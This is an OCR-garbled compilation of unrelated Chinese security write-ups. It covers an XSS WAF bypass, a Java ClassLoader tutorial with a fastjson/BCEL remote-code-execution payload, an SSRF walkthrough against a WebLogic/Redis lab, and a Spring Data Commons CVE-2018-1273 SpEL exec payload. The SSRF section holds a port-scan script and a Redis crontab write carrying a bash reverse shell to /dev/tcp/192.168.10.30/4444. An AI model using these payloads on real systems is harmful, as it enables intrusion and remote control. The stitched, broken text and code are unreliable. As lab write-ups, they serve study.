WWO02f\UOO2fwww alibaba.com\u002fChemicals_p8" }, { "name". "Construction\u0020\u9026\u0020Real\u0020Estate’, "hret". 
WOO ZNUGd2fwww alibaba com\ud02tConstruction\u002dReal\udazdEstate_pt3"}, name”: "Consumer\u0020Electronics”, "hret" 
IQO2'NuO02fwww alibaba com\u02fConsumer\u0O2dElectronics_p44" J, ( "name" "Electrical\ud020Equipment\u0020\u0026\u0020Supplies”, 
| ef” ug02nu002fwww alibaba comNuO02fElectr icalNuO02dEquipmentWu002dSupplies, p5" J, ( "name" 
— Electronics \uGd20Camponenits \ufOcAccessones \u0020\u0026\u0020Telecommunications”, “href” 
WON 2f\Ud02fwww alibaba com\u002{Electronics\u002dComponents\u002dAccessories\u002dTelecommunications_p502" }, { "name": 
i ergy”, "href” u0025u002fwww alibaba comNuDO2fEnergy. p10" }, ( "name" "Environment", "href" 
Au002f\u002fwww alibaba comWDO2fEnvironment. p11" ), { "name". "Fashion\u0020Accessories", "href 
L'Nu002fvu002tvww alibaba com\ud02fFashion\uod2dAccessories_p339" J, ( name". "Food\u0020\u0026\u0020Beverage”, "href" 
A^u002fu002fwww alibaba comwuDO2fFoodNuO02dBeverage. p2" }, ( "name" "Furniture", "href" 
"wu002fNu002fveww.alibaba c omxuDO2fFurniture, p1503" ), ( "name" "Giftswu0020xu0026Nu0020Cratts", "href" 


BANA nnne ener niente anit 


ET 








(MYTH FEN MT A Des TY Pe sem at Bde S Ee Se Y n oC ín R Kein P Monash 


</script> 


”WAF 没有 拦截 ， 但 只 要 一 闭合 WAF 就 拦截 。 


4 


a 
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07bNu0022500003Xu0022W1003aN00022vu005bNu007bNu005cVu0022endTimeNu005cvu0022u003a1654101999000, 4005cWu0022startTime i 


nd'0 ), "browseCategory" [ ("name": "Baby", "href": u0028vu002fwww alibaba.comNu002fBaby. p205787007" }, ( "name" "Pet\u0020Products", 

















程序 也 没有 对 Catld 参数 进行 过 滤 转 义 ,直接 " 就 可 以 截断 字符 ， 造 成 xss 攻 击 。 HTF 
payload， 都 被 waf 拦 截 了 。 


Q Google © Ottensive Security Exploit-DB 


MAAKT, EAL T wasKSRT UE, RAMRESAS SHB Aaler SRE 
看 来 是 不 能 直接 来 ， 都 是 被 waf 拦 截 ， 分 析 了 下 源码 ， 仔 细 看 了 看 。 看 js 手册 ， 按 照 


'<string>'.replace(/<pattern>/, function($1) { <code> } ) 


这 种 方法 waf 不 会 拦截 ， 因 此 可 以 构造 出 


'alert("xss")'.replace(/.*/g,eval) eval('alert("xss")') 
'string'.replace(/1/,alert) alert(1) 
‘bbbalert(1)cccc’.replace(/a\w{4}(\d)/, eval) eval(‘alert(1)') 


首先 构造 一 个 “strlng"， 直 接 输 入 字符 串 就 是 了 。 
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插入 我 们 得 用 一 个 ”来 截断 他 ， 构 造 出 我 们 的 方法 


tring". replace(/1/, alert)" 


这 样 还 不 能 


运行 ， 后 面 还 有 一 个 双 引 号 ， 用 “/"/ 注 释 掉 
们 注释 掉 了 后 面 一 个 引号 ， 也 注释 掉 了 最 后 一 个 ,所 以 构造 一 个 "，" 让 语句 完整 
ed 1/ alert eH 





"string".replace(/1/,alert), //" 


后 就 成 功 绕 过 waf 弹 了 个 窗 
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交 ASRC 汤 洞 重复 了 ， 咬 ， 手 慢 了 有 点 遗憾 ， 截 至 投稿 时 漏洞 还 没 修复 ， 做 了 脱 敏 处 理 


SRC as uae uro mwe meses nase sgn ERES 
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classLoader 类 加 载 机 制 
前 置 知识 


我 们 都 知道 ，java 的 编译 过 程 : 





源 代码 java 文 件 一 一 > (解释 器 ) 一 一 > 字 节 码 class 文 件 一 一 > (JVM 虚 拟 机 ) 一 一 > 机 器 码 
JVM 虚 拟 机 可 以 适应 不 同 的 平台 ， 因 此 java 有 可 移植 性 


ClassLoader 基 本 概念 


ClassLoader 是 一 种 类 加 载 机 制 ， 类 初始 化 时 ， 通 过 java.lang.ClassLoader 将 字 节 码 加 载 进 
JVM 内 存 


需要 注意 的 是 ， 类 初始 化 与 类 实例 化 是 不 同 的 


类 初始 化 
。 给 类 中 static 成 员 赋 初 始 值 /调用 staticf} 中 代码 的 过 程 
类 实例 化 


。 创建 一 个 对 象 的 过 程 
以 下 这 张 图 是 资 来 的 ， 非 常 直观 地 描述 了 ClassLoader 的 作用 汪汪 


JVM Language Classes e Ob 
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Method Area Heap | stacks 
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ClassLoader 分 类 
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assLoader 分 为 



















e Bootstrap ClassLoader 启动 类 加 载 器 

e 加 载 java 核 心 库 

o 将 /ib 目录 下 的 类 库 加 载 到 JVM 内 存 

o 不 能 被 开发 者 调用 

. Extension ClassLoader 扩展 类 加 载 器 

o 加 载 java 扩 展 库 

o 加 载 /lib/ext 目 录 下 的 类 库 

o 可 被 开发 者 使 用 

| + Application ClassLoader 应 用 程序 类 加 载 器 


o 加 载 用 户 编 写 的 类 

o 加 载 CLASSPATH 目 录 下 的 类 库 
o 可 被 开发 者 调用 

+ 自 定义 类 加 载 器 

o 需要 继承 java.lang.ClassLoader 


类 加 载 器 调用 顺序 : 启动 类 加 载 器 一 > 扩展 类 加 载 器 一 一 > 应 用 程序 类 加 载 器 一 一 > 自 定义 类 加 载 
器 ( 父 优先 ) 


“启动 类 是 扩展 类 加 载 器 的 父 ， 扩 展 类 是 应 用 程序 类 加 载 器 的 父 .… 


ClassLoader 核 心 方法 


”ClassLoader 的 几 个 核心 方法 : 


。 loadClass 加 载 java 类 

。 findClass 查找 java 类 (默认 是 抛 出 异常 ) 
。 findLoadedClass 查找 已 经 加 载 的 java 类 
。 defineClass 定义 java 类 

。 resolveClass 链接 java 类 


| 个 人 认为 其 中 比较 重点 的 是 loadClass 方 法 、defineClass 方 法 、resolveClass 方 法 
”一 、loadclass 方 法 : 加 载 指定 的 java 类 

返回 类 型 : 类 对 象 

首先 ， 判 断 是 否 已 经 加 载 class c = findLoadedClass(name); 


若 之 前 未 加 载 ， 判 断 当前 类 加 载 器 是 否 还 有 父 类 加 载 器 ， 则 使 用 父 类 加 载 器 进行 加 载 c = 


parent.loadClass(name, false); 
若 不 存在 父 类 加 载 器 ， 则 默认 先 使 用 启动 类 加 载 器 c = findBootstrapClassOrNull(name) ; 


若 返 回 null， 则 依照 自己 的 搜索 路 径 去 查找 类 DoS findClass(name); ; 没有 重 写 ClassLoader 类 
的 情况 下 则 是 直接 抛 出 异常 
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最 后 ， 若 成 功 查找 到 类 ， 链 接 找到 的 类 this. resolveClass(var4); | «4 


* 


protected Class«?» loadClass(String name, boolean resolve) 
throws ClassNotFoundException 





t 
synchronized (getClassLoadingLock(name)) ( 
Class c - findLoadedClass(name); 
if (c == null) { 
long t® = System.nanoTime(); 
try { 
if (parent != null) { 
c = parent.loadClass(name, false); 
) eise ( 
c = findBootstrapClassOrNull(name); 
} 
} catch (ClassNotFoundException e) { 
} 
if (c == null) { 
long ti = System.nanoTime(); 
c = findClass(name) ; 
sun.misc.PerfCounter .getParentDelegationTime().addTime(t1 = 
sun.misc.PerfCounter.getFindClassTime().addElapsedTimeFrom(t 
sun.misc.PerfCounter.getFindClasses().increment(); 
} 
} 
if (resolve) { 
resolveClass(c); 
j 
return c; 
} 
} 


从 以 上 代码 分 析 可 了 映 证 之 前 类 的 调用 顺序 ， 父 优先 顺序 ， 即 
启动 类 加 载 器 一 一 > 扩展 类 加 载 器 一 一 > 应 用 程序 类 加 载 器 一 一 > 自 定义 类 加 载 器 
以 下 图 比较 直观 地 表现 了 loadClass 整 体 流程 ， 局 和 
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er loadClass(className) 


^ 


~ 


ad already? 


» 





Yas 


V^ 


[ems 











Loadable from p| Find the class file Failed 
Parent? ond dao ek ae 
Succeeded ClassNotFoundException 
Yes 


LS 


fen it | 


于 启动 类 加 载 器 Bootstrap ClassLoader 是 C++ 写 的 ，java 源 码 中 不 存在 该 类 ， 所 以 以 下 调用 发 现 
展 类 加 载 器 Extension ClassLoader 的 父 类 加 载 器 返回 NULL 
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class hhdi{ |; s 
public static int hhdl; 
static { 
System.out.println("hhd1"); 


} 
class hhd2{ 
| public static int fhhd2; 
static { 
System.out.println("hhd2"); 
class hhd3( 
public static int hhd2; 
static { 
System.out.println("hhd3"); 











public class testtmp { 

public static void main(String[] args) { 
ClassLoader cl=testtmp.class.getClassLoader(); 
ClassLoader c2=c1.getParent(); 
ClassLoader c3=c2.getParent(); 
System.out.println(c1); 
System.out.println(c2); 
System.out.println(c3); 





testtmp 
/Library/Java/Javayi nes/jdk1.8.0 221.jdk/Con 


T 
sun.misc. Maun He TEOT 318b4aac2 
sun,misc.Launcher$ExtClassLoade 


349476842 
若是 通过 数组 定义 ， 则 不 会 进行 类 初始 化 
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Be * 






















Lass hhd2{ 
M public static int 5h32; ds s 37 
static { 
System.out.println("hhd2"); 
} 
hhd2(){ 


System.out.println("hhd2-new"); 


ublic class testtmp { 
public static void main(String[] args) { 
hhd2[] c=new hhd2[3]; 


/Library/Java/JavaVirtualMachines/jdk1.8.0 221.jdk/Contents/Home/bin/java : 


Process finished with exit code 0 

E. findclass 方 法 ; 查找 java 类 ， 默 认 抛 出 异常 

BE: 类 对 象 

3 里 直接 抛 出 异常 ， 但 是 可 以 对 ClassLoader 类 的 findClass 方 法 进行 重 写 


P protected Class<?> findClass(String vari) throws ClassNotFoundException { 
| throw new ClassNotFoundException(var1); 


三 、findLoadedClass 方 法 : 查找 已 经 加 载 的 java 类 
返回 类 型 : 类 对 象 
mative 修 饰 符 的 意思 是 : 调用 外 部 方法 ， 外 部 使 用 C 来 具体 定义 该 方法 


P protected final Class<?> findLoadedClass(String vari) { 
return !this.checkName(var1) ? null : this.findLoadedClass0(var1); 


} 


private final native Class<?> findLoadedClassO(String vari); 


| 四 、defineClass 方 法 : 定义 java 类 

返回 类 型 ; XNR 

| 这 个 类 在 一 些 漏洞 poc 上 非常 有 用 

defineclass 可 以 使 我 们 用 byte 数 组 自 定义 一 个 类 ， 并 返回 类 对 象 
defineClass 的 主要 输入 参数 是 


。 类 路 径 名 

。 自 定义 类 的 字 节 数组 

。 读 入 字 节 数组 的 index 
。 读 入 字 节 数组 的 长 度 
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举 一 个 defineClass 在 fastjison 上 的 利用 例子 "ms 


* 






34fastjsonJIl&org.apache.tomcat.dbcp.dbcp.BasicDataSource3$7f Hi i É driverClassL 
和 driverClassName 属 性 时 ， 会 调用 到 BasicDataSource 类 的 getConnection() 方 法 ， 该 方法 中 
有 class.forName(driverClassName, true, driverClassLoader) 代码 


具体 调用 过 程 : 


getConnection( )—>createDataSource( )—>createConnectionFactory()—>Class. .forNa 


而 Class.forName 可 以 进行 类 的 初始 化 ， 类 的 初始 化 块 中 设置 恶意 代码 ， 即 可 造成 远程 代码 执行 
因此 我 们 只 要 构造 driverClassName 和 driverClassLoader 即 可 

接 下 来 只 要 寻找 driverClassLoader 所 在 类 ， 然 后 再 根据 该 类 构造 driverClassName 
driverClassLoader 所 在 类 需要 满足 以 下 特征 


。 继承 于 java.lang.ClassLoader 类 
。 重 写 了 loadClass 或 findClass 
。 重 写 的 loadClass 或 findClass 类 中 含有 defineClass 
。 能 有 概率 跳 到 defineClass 
o 比如 .equals 是 不 太 可 能 的 ， 但 是 .indexOf 就 有 机 会 


com.sun.org.apache.bcel.internal.util.ClassLoader 类 符合 以 上 特征 
com.sun.org.apache.bcel.internal.util.ClassLoader 类 重 写 了 loadClass 方 法 ， 该 方法 代码 如 下 


可 以 看 到 cl = this.defineClass(class_name, bytes, 0, bytes.length); 
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prected Class load (String class name, boolean resolve) throws ClassNotFot 


if (cl == null) f 
JavaClass clazz - null; 
if (class name.indexOf("$$BCEL$$") >= 9) { 
clazz - this.createClass(class name); 
} else { 
if ((clazz = this.repository.loadClass(class_name)) == null) { 
throw new ClassNotFoundException(class. name); 


} 

clazz = this.modifyClass(clazz); 
} 
if (cləzz t= nuli) { 


byte[] bytes = clazz.getBytes(); 
cl = this.defineClass(class_name, bytes, ©, bytes.length); 


} else { 


cl = Class.forName(class name); 


"Qtype" : "org.apache.tomcat.dbcp.dbcp.BasicDataSource", 
"driverClassLoader" 


{ 


"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader" 


}, 


"driverClassName" : "$$BCEL$$$1$8b$1$ASASAS$. o o " 


样 的 ，URLCIassLoader 也 重 写 了 loadClass， 可 以 进行 远程 .class 调 用 
ES resolveClass 方 法 : 链接 java 类 

{EBL void 

同样 是 外 部 方法 定义 


protected final void resolvec 
this.resolveClassO(var1); 





} 


private native void resolveClassO(Class«?: 
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在 反 序列 化 中 
如 果 类 描述 符 是 动态 代理 类 ， 则 调用 resolveProxyClass 方 法 来 获取 本 地 类 

如 果 不 是 动态 代理 类 则 调用 resolveClass 方 法 来 获取 本 地 类 

因此 经 常 在 resolveClass 方 法 中 检测 是 否 有 恶意 类 ， 即 进行 黑 名 单 判 断 


重 写 findClass 方 法 


自 定义 ClassLoader， 重 写 findClass 方 法 
这 里 更 能 理解 刚才 所 说 的 fndClass 类 的 作用 。 不 重 写 默认 是 抛 出 异常 
重 写 了 能 够 自 定义 搜索 路 径 ， 只 不 过 要 与 自 定义 类 的 字 节 码 中 的 路 径 相 一 致 





import java.lang.reflect.InvocationTargetException; 
public ciass t 1 
byte[] testiznew 7:27 30, “BO, 97 0,7 87 rọ, j 
@Override 
protected Class<?> c cud ni throws HRSG OnE oS an tg 
if(hhh.equals("com.anbai.sec.cias ler, Test Loworld")){ 





return defineClass(hhh, M ,testi.length); 


} 
return super.findClass(hhh); 





public st 






InstantiationExceptio 
test c=new test(); 
Class clazz-c.loadClass("com.anbai.sec.classloader.TestHe. 
Object object=clazz.newInstance(); 
String str= (String) clazz.getDeclaredMethod("hello").invoke(object); - 





System.out.println(str); 


TTA 



















x00 漏洞 说 明 SSRF (Server-Side Request Forgery) 即 服务 端 请 求 伪 造 ， 从 字面 意思 上 理解 就 是 
和 造 一 个 服务 端 请 求 ， 也 即 是 说 攻击 者 伪造 服务 端的 请 求 发 起 攻击 ， 攻 击 者 借 由 服务 端 为 跳板 来 攻 
目标 系统 ， 既 然 是 跳板 ， 也 就 是 表明 攻击 者 是 无 法 直接 访问 目标 服务 的 ， 为 了 更 好 的 理解 这 个 过 
， 我 从 网 上 找 了 一 张 图 ， 贴 在 了 下 面 。 


ETO 





* 
^ 本 
2 | ©) ^ i 
i ^v b 
on 
"s 


J. Web Server makes XD 
a request on behalf ^ 
of the user. : 





“0x01 漏洞 影响 上 面 简单 介绍 了 一 下 SSRF 的 原理 ， 那 么 SSRF 能 干什么 ， 产 生 哪些 危害 呢 ? 


”利用 SSRF 可 以 进行 内 外 网 的 端口 和 服务 探测 、 主 机 本 地 敏感 数据 的 读 取 、 内 外 网 主机 应 用 程序 漏 
洞 的 利用 等 等 ， 可 以 说 SSRF 的 危害 不 容 小 启 了 。 


0x02 漏洞 发 现 既然 SSRF 有 这 些 危害 ， 那 我 们 要 怎么 发 现 哪里 存在 SSRF， 发 现 了 又 怎么 利用 呢 ? 
接 下 来 就 好 好 踪 踪 这 点 。 


”可 以 这 么 说 ， 能 够 对 外 发 起 网 络 请 求 的 地 方 ， 就 可 能 存在 SSRF 漏 洞 ， 下 面 的 内 容 引 用 了 先知 社区 
的 一 篇 文章 ， 文 章 链接 在 底部 。 


具体 可 能 出 现 SSRF 的 地 方 : 
| 1. 社 交 分 享 功能 : 获取 超 链 接 的 标题 等 内 容 进 行 显示 
2. 转 码 服务 : 通过 URL 地 址 把 原 地 址 的 网 页 内 容 调 优 使 其 适合 手机 屏幕 浏览 
3 .在线 翻译 : 给 网 址 翻译 对 应 网 页 的 内 容 
4. 图 片 加 载 /下 载 : 例如 富 文本 编辑 器 中 的 点 击 下 载 图 片 到 本 地 ; 通过 URL 地 址 加 载 或 下 载 图 片 
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5. 图 片 /文章 收藏 功能 : 主要 网 站 会 取 URL 地 址 中 title 以 及 文本 的 内 容 作为 显示 以 求 一 个 好 的 于 


验 









6. 云 服务 厂商 : 它 会 远程 执行 一 些 命令 来 判断 网 站 是 否 存活 等 ， 所 以 如 果 可 以 捕获 相应 的 信息 
可 以 进行 SSRF 测 试 


7. 网 站 采集 ， 网 站 抓 取 的 地 方 : 一 些 网 站 会 针对 你 输入 的 url 进 行 一 些 信息 采集 工作 
8. 数 据 库 内 置 功 能 : 数据 库 的 比如 mongodb 的 copyDatabase 函 数 

9. 邮 件 系统 : 比如 接收 邮件 服务 器 地 址 

10. 编 码 处 理 , 属性 信息 处 理 ， 文 件 处 理 : 比如 ffpmg，ImageMagick，docx，pdf，xml 处 理 器 等 


11. 未 公开 的 api 实 现 以 及 其 他 扩展 调用 URL 的 功能 : 可 以 利用 google 语法 加 上 这 些 关键 字 去 寻找 
SSRF 漏 洞 ， 一 些 的 url 中 的 关键 字 : share, wap. url. link, src, source, target, u, 3g, 
display. sourceURI, imageURL, domain...... 


12. 从 远程 服务 器 请 求 资源 (upload from url 如 discuz! ; import & expost rss feed 如 web blog; f$ 
用 了 xml 引 擎 对 象 的 地 方 如 wordpress xmirpc.php) 


0x03 漏洞 验证 1、 因 为 SSRF 漏 洞 是 构造 服务 器 发 送 请 求 的 安全 漏洞 ， 所 以 我 们 可 以 通过 抓 包 分 析 
发 送 的 请 求 是 否 是 由 服务 器 端 发 送 的 来 判断 是 否 存在 SSRF 漏 洞 


2、 在 页 面 源码 中 查找 访问 的 资源 地 址 ， 如 果 该 资源 地 址 类 型 为 下 面 这 种 样式 则 可 能 存在 SSRF 漏 洞 
http/Awwwoooccom/a.php?image- O4) 0x04 漏洞 利用 
1、 一 个 简单 的 测试 靶场 测试 PHP 代 码 : 


<?php 

function curl($url)( 

$ch = curl_init(); 

curl_setopt($ch, CURLOPT URL, $url); 
curl_setopt($ch, CURLOPT_HEADER, 0); 
curl_exec($ch); 
curl_close($ch); 


} 

$url = $_GET['url']; 
curl($url); 

?» 
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用 户 体 利用 phpstudy 或 者 宝塔 搭建 好 靶场 后 ， 访 问 自己 的 url 地 址 。 
ii-teamssix n 
P. 就 | CE ^ © & [192.168.38.132/ssrf.php?url-teamssbcom 
GES 现 ] DNS 
等 mr 2019-12-06 
PERSE | ONS | iex 
dX 如 果 服 务 器 有 其 他 服务 只 能 本 地 访问 ， 比 如 phpmyadmin， 则 可 以 构造 ssrf.php?url=127.0.0.1、 


iphpmyadmin 进 行 访问 ， 接 下 来 看 看 利用 SSRF 扫 描 目标 主机 端口 


打开 Burp， 抓 包 发 到 Intruder， 设 置 Payload 位 置 
fi © 

设置 在 基本 请 求 中 插入 有 歼 负 载 的 位 置 。 攻 击 类 型 指定 如 何 将 有 效 负 载 分 配给 有 效 负载 位 置 。 - 有 关 详 细 信 息 ， 请 参阅 帮助 。 
分 析 攻击 类 型 MEF (Sniper) d eder itid 





GET http.//192.168.38.132/ssrf.php?uri-127.0.0.1| 80 8 HTTP/1.1 
Host: 192.168.38.132 
局 洞 [ User-Agent; Mozilla/5.0 (Windows NT 10.0; Win64: x64; rv:71.0) Gecko/20100101 Firefox/7 1.0 
Accept: text/html.application/ xhtml xml.application/xml;q-0.9.*/*:q-0.8 
Accept-Language: zh-CN.zh:q«0.8.zh- TW:q«0. 7.zh-HK:qs0.5.en-US;q«0.3.en:q«0.2 
Accept-Encoding: gzip. deflate 
Connection: close 
Upgrade-Insecure-Requests: 1 
Cache-Control: max-age=0 


将 载荷 类 型 设置 为 number， 数 字 范 围 从 1-65535， 开 始 爆破 


您 可 以 定义 一 个 或 多 个 有 效 负 载 集 。 有 效 负载 集 的 数量 取决 于 "位置" 选项 卡 中 定义 的 攻击 类 型 。 每 个 有 效 负载 集 1 
有 效 负载 集 1 C) ”有 效 载 闪 数量 。 65.535 
APRE. 65,535 
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根据 响应 长 度 及 响应 码 ， 可 以 判断 出 80、3389 是 开放 着 的 











¥ 

请 求 有 效 载荷 状态 错误 超时 

80 80 200 

49157 49157 500 

49156 49156 500 

49155 49155 500 884 
49154 49154 500 884 
49153 49153 500 884 
49152 49152 500 884 
135 135 500 884 
3306 3306 200 2 a 
427 427 503 264 
417 417 503 264 
414 414 503 264 


2. Weblogic ASM 搭建 环境 参考 ; 
搭建 好 之 后 ， 访 问 1P:7001/uddiexplorer/ 即 可 访问 ， 如 果 搭 建 在 本 机 ，IP 就 是 127.0.0.1。 


1、 漏 洞 存在 测试 Weblogic 的 SSRF 漏洞 地 址 在 /uddiexplorer/SearchPublicRegistries.jsp ， 开 启 
Burp 代 理 后 ， 来 到 漏洞 地 址 ， 随 便 在 搜索 框 里 输 点 东西 ， 点 击 search 按钮 抓 包 | 
earch public registites 2 + 





Search public registries 


Function Public Registry mm 


* Search by business name 





Search by key 


Search for 


| Search 





Explorer Help 


可 以 看 到 在 请 求 包 里 的 operator 参数 值 为 URL， 说 明 此 处 可 能 存在 SSRF 漏 洞 
POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1 

Host: 192.168,38.134:7001 

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 

Accept: text/html application/xhtml+xml,application/xmi:q=0.9,*/*:q=0.8 

Accept-Language: zh-CN,zh:qx0.8.zh-TW:q=0.7 2h-HK :q=0.5,en-US:q=0,3.en;q=0.2 

Accept-Encoding: gzip. deflate 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 173 

Origin: http://192.168.38.134:7001 

Connection: close 

Referer: htto://192.168.38.134:700 1/uddiexplorer/SearchPublicRegistries. jsp 

Cookie: 

public inquiryurlsshttp://www-3.ibm.com/services/uddi/inquiryapi ! IBMihttp;//www-3.ibm.com/services/uddi/v2beta/inquiryapi! IBM 
V 2ihttp://uddi.rte.microsoft.com/inquire!Microsoftihttp://services.xmethods.net/glue/inquire/uddi! XMethodsi; 
JSESSIONID«1G9yd52Jpx9J2 TQ IryJDvpYRty VOczyQik8H IvOyBZy Sv 18bsQgl! -2098539762 
Upgrade-Insecure-Requests: 1 











operato chit 3AYS2F 2 w ww 3.ibm.con 
key=&txtSearchforsaselfor=Gusinesssiocation&btnoubmit=Search SS 
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operator 参数 值 为 改 为 其 他 URL， 再 次 进行 发 包 测试 
bk $ ipi hy 
参数 | Hex | [Raw] | Hex | HTML ] Render | 
k xplorer/SearchPublicRegistries jsp 的 POST AP 

J 名 fa = 


publicinquiryurls http ^www-3ibm com/semcesiuddi 


JSESSIONID 1G9vd52Jpx9J2TQ1ryJDypYRyV0cz 。 Wk 
spt i 


¥ 














<p>An error has occurred« t» 
weblogic.uddi.client.structures.exception. XML. SoapException: 
[Security:090497 ]HANDSHAKE, FAILURE alert received 

from www.teamssix.com - 104.28.23.70. Check both sides 
of the SSL configuration for mismatches in supported 











rdoSearch name ciphers, supported protocol versions, trusted CAs, and 
txtSearchname teamsix T hostname verification settings. 
txtSearchkey </table> 
txtSearchfor «ftd» 
«ftr» 
selfor Business location i 
c </table> 
btnSubmit Search 


«script language: javascript?» 


function openWin(name, URL) 


{ 


权 响 应 包 翻 到 底部 ， 可 以 很 明显 的 看 到 靶 机 对 我 们 修改 后 的 URL 进 行 了 访问 ， 接 下 来 把 URL 端 口 修 
攻 一 下 ， 也 就 是 让 靶 机 请 求 一 个 不 存在 的 地 址 


hed 


Raw 头 [Hex | HTML | Render | 



















hexplorer/SearchPubhcRegistnies jsp 的 POST ifi <table widths 10096 celipaddings5 cellspacing=5 r 

j valign=top> | 
- 启 & fi 添加 | 
publicinquiryuris http /^wwWw-31bm com/services/uddh/i i 

JSESSIONID JIG9yd52Jpx9J2TQ1nmJDYPYRfYVOcz L2 «p» An error has occurred<BR > | 

operator 至 顶 weblogic.uddi.client.st : | 

rdoSearch name Tried all: 2 addresses; but could not connect over HTTPS to] | 

txtSearchname teamsix T server: www.teamssix.com port: 1234 | 

tetSearchkey am ; i 

«ftd» i 

txtSearchfor | 

</tr> | 

selfor Business location 





</table> 
«script languages" javascript'» 


btnSubmit Search 


function openWin(name, URL) 


2、 通 过 Redis 服 务 反弹 shell 既然 想 通 过 Redis 服 务 反弹 Shell， 就 需要 先知 道 Redis 服 务 的 内 网 IP， 
这 里 因为 是 本 地 环境 ， 内 网 IP 就 直接 查看 了 ， 如 果 公 网 的 话 就 要 看 前 期 信息 收集 怎么 样 了 ， 当 然 爆 
破 IP 也 是 可 以 的 。 


进入 redis 服 务 的 shell， 查 看 内 网 IP 


:~/vulhub/weblogic/ssrf# docker exec -it ssrf_redis 1 bash 
[root@5d9f91f455b6 /]# ifconfig 
etho Link encap:Ethernet HWaddr 02:42:AC:12:00:02 
inet addr:172.18.0.2 Bcast:172.18.255.255 Mask:255.255.0.0 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:i 
RX packets:129 errors:0 dropped:0 overruns:0 frame:0 


TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:9 


RX bytes:13176 (12.8 KiB) TX bytes:0 (0.0 b) 


知道 内 网 IP 后 ， 就 能 扫描 端口 了 ， 下 面 是 我 写 的 一 个 小 脚本 ， 当 然 用 Burp 也 是 可 以 的 
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import requests leet » 


url - 'http://192.168.38.134:7001/uddiexplorer/SearchPublicRegistries.jsp?' 
headers = {'Content-Type': 'application/x-www-form-urlencoded'} 
for port in range(1, 65535); 
data = 'operator=http://172.18.0.2:{}&rdoSearch=name&t xt Searchname=teamsixgt 
r = requests.post(url, headers=headers, data=data) 
ih Tried all' not in r.text: 
print('\n\n[+] {} 发 现 端口 \nXn' .format(port)) 


执行 脚本 


~# python3 ssrf portscan.py 
[+] 6379 发 现 端口 


通过 扫描 发 现 Redis 服 务 的 默认 端口 6373 是 开放 的 。 
接 下 来 使 用 Burp 写 入 shell， 注 意 下 面 的 IP 地 址 为 自己 nc 监听 的 地 址 























http://172.18.0.2:6379/test 














set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.10.30/4444 @>&1\n\n\n\ 


config set dir /etc/ 
config set dbfilename crontab 


save 
aaa 
> 
PEI 日 标 :hap ,jl9216838 134.7001 7 O) 
5 " 
[eee fest s De zs -—— 
yadigenetop 











kbetpiorerSewrnPubhecHegeines pup 的 POST AE 







eno has occaed.t 


bogie uddi chent structures exception XML. Soapkxception: Received a response from url 
MA ITa 18.0.2.6379/te4* set 1 &quot\nininin® * ^ * * poot bash o &gt amp: 
lename 





Idevitcp! 192. 168. 1030/4444 O&gt.&amp; Tnin\ning&quot, contig set dir fete! cont 19 get dbtil 
crontab save ane which did not have a valid SOAP content-type: nul 
M 











Body setot usines location Are 
Body Dengue Search «nts gà languages" javascript > 


function oper Winloame, URL) 


var new window = window open URL name), 


如 果 使 用 Burp 的 话 ， 直 接 把 那 几 行 代码 复制 到 operator 参数 后 面 就 行 ， 就 不 用 URL 编 码 了 。 
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Sp?! 


\n\n\ 





如 果 反 弹 不 回 Shell ， 在 确定 各 个 IP、 端 口 等 参数 都 没有 问题 的 情况 下 ，Burp 里 多 点 几 次 几 次 发 送 


脏 可 以 了 ， 我 有 时 候 都 需要 点 个 几 十 次 才能 反弹 Shell ， 感 觉 有 些 情况 下 反弹 Shell 是 个 比较 玄学 
bens. 


n 
]* netstat -pantu 


ons (servers 
PID/Program name 


.0 * l/redis-server * 
44752 : 30:444 ESTABLISHED 828/bash 
.2:44754 192. . 168.10. 30:4444 ESTABLISHED 890/bash 
Sr LISTEN l/redis-server * 
.11:47009 0.0.0.0:* = 





jp 0 127.0. 
ot@sd9f91f455b6 ~ 


0x05 绕 过 技巧 1、 添 加 端口 号 : 
2、 短 网 址 绕 过 
3、IP 限 制 绕 过 :; 十 进 制 转换 、 八 进 制 转 换 、 十 六 进 制 转换 、 不 同 进 制 组 合 转换 


4、 协 议 限制 绕 过 : 当 url 协 议 限 制 只 为 http(s) 时 ,可 以 利用 follow redirect 特 性 ,构造 302 跳 转 服 务 , 结 合 
dict://,file://,gopher:// 


5、 可 以 指向 任意 ip 的 域名 : xip.io 
6. @ 


0x06 SSRF 防 御 1、 过 滤 返 回信 息 ,验证 远程 服务 器 对 请 求 的 响应 是 比较 容易 的 方法 。 如 果 web 应 用 
是 去 获取 某 一 种 类 型 的 文件 。 那 么 在 把 返回 结果 展示 给 用 户 之 前 先 验证 返回 的 信息 是 否 符合 标 ， 


2、 统 一 错误 信息 ,避免 用 户 可 以 根据 错误 信息 来 判断 远程 服务 器 的 端口 状态 。 

3、 限 制 请 求 的 端口 为 http 常 用 的 端口 ,比如 80,443,8080,8090 

4、 黑 名 单 内 网 ip。 避 免 应 用 被 用 来 获取 内 网 数据 ,攻击 内 网 

5、 禁 用 不 需要 的 协议 。 仅 仅 允 许 http 和 https 请 求 。 可 以 防止 类 似 于 file:///,gopher:1/,ftp:// 等 引起 的 问 


原文 地 址 : 
参考 文章 
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Spring-Data-Commons (CVE-2018-1273) 


Spring-Data-Commons (CVE-2018-1273) 


。 漏洞 条 件 
Spring Data Commons 1.13-1.13.10 
Spring Data Commons 2.0-2.0.5 


。 大 致 描述 用 户 在 项 目 中 利用 了 Spring-data 的 相 
将 用 户 提交 的 form 表 单 的 key 值 作为 Spel 的 执行 


复 现 
vulhub 的 docker 中 有 该 漏洞 


[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /2.txt") 


POST /users?page-&size-5 HTTP/1.1 

Host: 127.0.0.1:83 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 
10 14 4) AppleWebKit/605.1.15 (KHTML, like Gecko) 
MicroMessenqer/2.3.25(0x12031910) MacWechat 
NetType/WIFI WindowsWechat 

Accept: 
text/html,application/xhtml*xml,application/xml;q-0,9,*/ 
*iq*0.8 

Accept-Language: 
zh-CN,zh;q-0.8,2h-TW;q-0.7,zh-HK;q*-0.5,en-US;q-0.3,en;g- 
9.2 i 
Accept-Encoding: gzip, deflate 

Content-Type: application/x-www-form-urlencoded 
Content-Length: 118 

